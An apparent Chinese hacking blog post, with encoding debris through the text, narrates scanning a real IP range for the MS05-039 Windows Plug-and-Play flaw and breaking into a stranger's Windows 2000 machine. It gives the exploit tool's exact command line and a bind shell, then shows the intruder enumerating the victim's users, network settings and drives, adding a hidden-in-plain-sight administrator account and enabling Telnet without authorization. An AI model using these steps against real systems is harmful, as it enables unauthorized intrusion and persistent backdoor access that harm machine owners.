其實(shí)MS05039這個(gè)漏洞出來(lái)也有一段時(shí)間了����,一直在忙自己的事,沒(méi)來(lái)得及親自去試下到底如何���,成功率到底如何~哎~都怪自己怎么這么多事�����,總是沒(méi)時(shí)間~直到前段時(shí)間網(wǎng)上一朋友問(wèn)了些關(guān)于這個(gè)漏洞的問(wèn)題才使我決定找個(gè)時(shí)間親自來(lái)看看這個(gè)漏洞到底如何……
首先是找工具���,其實(shí)這個(gè)EXP我早就拿到了,有3個(gè)版本的�,一個(gè)是我非我編輯的,一個(gè)是小榕改寫(xiě)的,再一個(gè)就是無(wú)敵寫(xiě)的了��。前2個(gè)是正向溢出�����,而無(wú)敵的支持反向溢出����,隨便用哪個(gè)了����,只是實(shí)驗(yàn)而已,我是懶得養(yǎng)機(jī)的�����,很麻煩的�,自己電腦已經(jīng)很好了,不需要?jiǎng)e人的�,呵呵~再就是一個(gè)掃描漏洞的工具,MS05039Scan.exe���,不曉得誰(shuí)寫(xiě)的�,還是個(gè)E文版呢?不過(guò)界面和去年出的MS04011漏洞界面基本相同����,沒(méi)有什么差別,所以很容易上手��,直接輸入想檢測(cè)的IP段�����,我也隨便輸入我做實(shí)驗(yàn)的一個(gè)IP段�����,這個(gè)IP段里老是落后別人的補(bǔ)丁���,出的漏洞很久遠(yuǎn)的都能在這里找到……
掃描很快出結(jié)果��,哈��,一個(gè)C段網(wǎng)有58臺(tái)有這個(gè)漏洞���,真是不少啊,加上沒(méi)開(kāi)機(jī)的�,估計(jì)漏洞率50%,截取一部分如下:
代碼:
--------------------------------------------------------------------------------
IP,Hostname,NetBIOS,Status
218.***。***.1,"ALI","ALI","Vulnerable"
218.***�。***.86,"PN4","PA4","Vulnerable"
218.***。***.87,"YH","YH","Vulnerable"
218.***����。***.92,"WG","WG","Not vulnerable"
218.***。***.94,"ZEZ","ZEZ","Vulnerable"
218.***�。***.95,"FANG","FANG","Vulnerable"
218.***。***.97,"ZRONG","ZRONG","Not vulnerable"
218.***��。***.98,"呆板吧","呆板吧","Vulnerable"
218.***����。***.101,"SERVER1","SERVER1","Vulnerable"
218.***�����。***.14,"USER14","-USER14","Not vulnerable"
…………………………
--------------------------------------------------------------------------------
看到Status顯示Vulnerable的就是可以溢出的了�����,這么多����,隨便找一個(gè)吧,就找218.***。***.98這個(gè)吧���,反正實(shí)驗(yàn)嘛���,我又不做破壞,實(shí)驗(yàn)好了我還幫他補(bǔ)好漏洞的���,OK����,下面繼續(xù):
本人比較喜歡小榕���,也正向他的路發(fā)展�,所以就用小榕的來(lái)試吧……開(kāi)CMD�,切換到所在目錄。先輸入程序名ms0539來(lái)看看怎么用的~如下:
代碼:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp.
D:\ms05039\小榕改寫(xiě)的版本Ms05039>ms0539
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
ms0539 <host> <bind port> <Type>
Type: 0-Windows 2000 sp4 English Version
1-Windows 2000 sp4 Chinese Version
--------------------------------------------------------------------------------
看到這行:ms0539 <host> <bind port> <Type>
就曉得是文件名 要溢出的主機(jī)IP 要溢出的端口 類型
這個(gè)類型就在0和1之間選擇�,注意這個(gè)只能溢出WIN2000的機(jī)子,對(duì)XP是沒(méi)作用的�,我國(guó)的機(jī)子大部分都是中文的啦,就用類型1OK了��。接著來(lái):
代碼:
--------------------------------------------------------------------------------
D:\ms05039\小榕改寫(xiě)的版本Ms05039>ms0539 218.***�����。***.98 123 1
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus, Modified by netXeyes 2005.
[*] connecting to 218.***。***.98:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 218.***��。***.98:123
--------------------------------------------------------------------------------
OK��,到這里好象是成功了���,就用NC連上123這個(gè)端口回車(chē)就出現(xiàn)下面的SHELL了����,可以看到是2000的機(jī)子����,先看下用戶�,net user可以看到如下:
代碼:
--------------------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp.
E:\WINNT\system32>net user
\ 的用戶帳戶
-----------------------------------------------------------------
007 admin
Administrator Guest
命令運(yùn)行完畢,但發(fā)生一個(gè)或多個(gè)錯(cuò)誤���。
E:\WINNT\system32>
--------------------------------------------------------------------------------
在來(lái)看看網(wǎng)絡(luò)狀況�,自然用ipconfig -all了����,如下:
代碼:
--------------------------------------------------------------------------------
I:\>ipconfig -all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : 呆板吧
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地連接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet
Adapter
Physical Address. . . . . . . . . : 00-**F8-**-77-66
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 218.***�����。***.98
Subnet Mask . . . . . . . . . . . : 255.255.252.0
Default Gateway . . . . . . . . . : 218.***�����。***.254
DNS Servers . . . . . . . . . . . : 218.**.***.1
218.**.***.2
--------------------------------------------------------------------------------
恩����,對(duì)�,就是這個(gè)機(jī)子,我再來(lái)看看他盤(pán)里都裝了些什么……
代碼:
--------------------------------------------------------------------------------
E:\WINNT\system32>d:
D:\>dir
驅(qū)動(dòng)器 D 中的卷是 1
卷的序列號(hào)是 38C7-0F82
D:\ 的目錄
2005-06-04 16:45 <DIR> Record
0 個(gè)文件 0 字節(jié)
1 個(gè)目錄 25,524,781,056 可用字節(jié)
D:\>c:
C:\>dir
驅(qū)動(dòng)器 C 中的卷是 RESTORE
卷的序列號(hào)是 2933-4048
C:\ 的目錄
2000-09-19 08:02 <DIR> DOS
1994-05-31 06:22 9,349 WINA20.386
2004-02-03 03:24 0 PQTMP.FIL
2002-09-17 08:24 1,024,016 Ghost.exe
2004-01-30 20:00 70 backup.BAT
2004-02-03 02:19 134 restore.BAT
1998-06-19 20:01 41,302 oakcdrom.sys
2004-05-20 12:54 <DIR> bootdisk
2004-05-20 15:48 <DIR> Config
6 個(gè)文件 1,074,871 字節(jié)
3 個(gè)目錄 15,855,616 可用字節(jié)
C:\>f:
F:\>dir
驅(qū)動(dòng)器 F 中的卷是 新加卷
卷的序列號(hào)是 88AC-C116
F:\ 的目錄
2005-06-04 16:49 <DIR> install
2005-08-09 11:49 <DIR> Program File
2005-08-08 09:42 <DIR> Record
0 個(gè)文件 0 字節(jié)
3 個(gè)目錄 29,421,977,600 可用字節(jié)
F:\>g:
G:\>dir
驅(qū)動(dòng)器 G 中的卷是 新加卷
卷的序列號(hào)是 ACDC-C9C8
G:\ 的目錄
2005-06-08 12:47 <DIR> Record
0 個(gè)文件 0 字節(jié)
1 個(gè)目錄 525,041,664 可用字節(jié)
G:\>h::
文件名����、目錄名或卷標(biāo)語(yǔ)法不正確。
G:\>h:
H:\>dir
驅(qū)動(dòng)器 H 中的卷是 新加卷
卷的序列號(hào)是 2CE3-1A39
H:\ 的目錄
2005-08-09 22:38 979,820,531 BACKUP.GHO
2005-08-12 23:31 <DIR> Record
1 個(gè)文件 979,820,531 字節(jié)
1 個(gè)目錄 524,390,400 可用字節(jié)
H:\>i:
I:\>dir
驅(qū)動(dòng)器 I 中的卷是 新加卷
卷的序列號(hào)是 8CEB-856F
I:\ 的目錄
2004-05-28 20:41 910,265,010 BACKUP.GHO
2005-08-08 10:03 <DIR> Record
1 個(gè)文件 910,265,010 字節(jié)
1 個(gè)目錄 525,303,808 可用字節(jié)
I:\>j:
系統(tǒng)找不到指定的驅(qū)動(dòng)器����。
I:\>
--------------------------------------------------------------------------------
一個(gè)一個(gè)轉(zhuǎn),我暈哈�,這么多盤(pán),C��,D��,E,F(xiàn)�,G,H��,I這么多��,但是沒(méi)裝什么好玩的東西�����,無(wú)聊人搞這么多盤(pán)做什么��,我120G都裝滿了��,估計(jì)是個(gè)有錢(qián)人~
那就加個(gè)用戶試下權(quán)限����,不用試,肯定是系統(tǒng)權(quán)限����,但是還是看看吧�,反正時(shí)間還早:
代碼:
--------------------------------------------------------------------------------
I:\>net user icesky /add
命令成功完成。
I:\>net localgroup administrators icesky /add
命令成功完成���。
I:\>net user
\ 的用戶帳戶
--------------------------------------------------------------------
007 admin
Administrator Guest icesky
分子樓1
命令運(yùn)行完畢����,但發(fā)生一個(gè)或多個(gè)錯(cuò)誤。
I:\>
--------------------------------------------------------------------------------
哎~好了�,加個(gè)icesky的管理員,就不隱藏了����,人家發(fā)現(xiàn)也沒(méi)事,給他提個(gè)醒好了��,再看看開(kāi)了些什么服務(wù):
代碼:
--------------------------------------------------------------------------------
I:\>net start
已經(jīng)啟動(dòng)以下 Windows 2000 服務(wù):
Automatic Updates
COM+ Event System
Computer Browser
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
IPSEC Policy Agent
Logical Disk Manager
Messenger
Network Connections
NVIDIA Display Driver Service
OfficeScanNT 實(shí)時(shí)掃描
OfficeScanNT 監(jiān)聽(tīng)程序
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry Service
Removable Storage
Rising Process Communication Center
Rising Realtime Monitor Service
RunAs Service
Security Accounts Manager
Server
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensio
Workstation
命令成功完成�����。
--------------------------------------------------------------------------------
哦����,都是常見(jiàn)的,那再給他開(kāi)個(gè)TELNET吧���,很簡(jiǎn)單的啦�!如下:
代碼:
--------------------------------------------------------------------------------
I:\>net start telnet
Telnet 服務(wù)正在啟動(dòng) .
Telnet 服務(wù)已經(jīng)啟動(dòng)成功���。
I:\>
--------------------------------------------------------------------------------
OK��,搞定~別的就不看下去了�,下面總結(jié)一下:
總結(jié):從開(kāi)始拿到這個(gè)漏洞的描述,我就覺(jué)得和去年的MS04011很是相似�,再看到那個(gè)掃描工具后更是覺(jué)得很像,其實(shí)2者的利用幾乎完全一樣���;溢出支持正向和反向溢出����;成功后是系統(tǒng)權(quán)限��;需要注意的一點(diǎn)����,也就是有人問(wèn)我的一點(diǎn)是:正向溢出成功后連上去,在SHELL里輸入時(shí)是沒(méi)有回顯的�,也就是你輸入回車(chē)之前是看不到你到底輸入的是什么字符和命令,這就要求你不能輸錯(cuò)了��,要不命令是不會(huì)執(zhí)行的����,但是當(dāng)你輸入回車(chē)偶就可以看到你輸入的命令了,也就是說(shuō)��,你輸入回車(chē)后才會(huì)回顯你的輸入和執(zhí)行結(jié)果��;而反向溢出得到的SHELL是可以回顯的���。別的就沒(méi)什么了��,哦~還有就是趕快打補(bǔ)丁����,溢出成功率非常高����。好象利用這個(gè)漏洞的蠕蟲(chóng)病毒狙擊波已經(jīng)開(kāi)始活動(dòng)了,大家千萬(wàn)小心~偶就不羅嗦了~
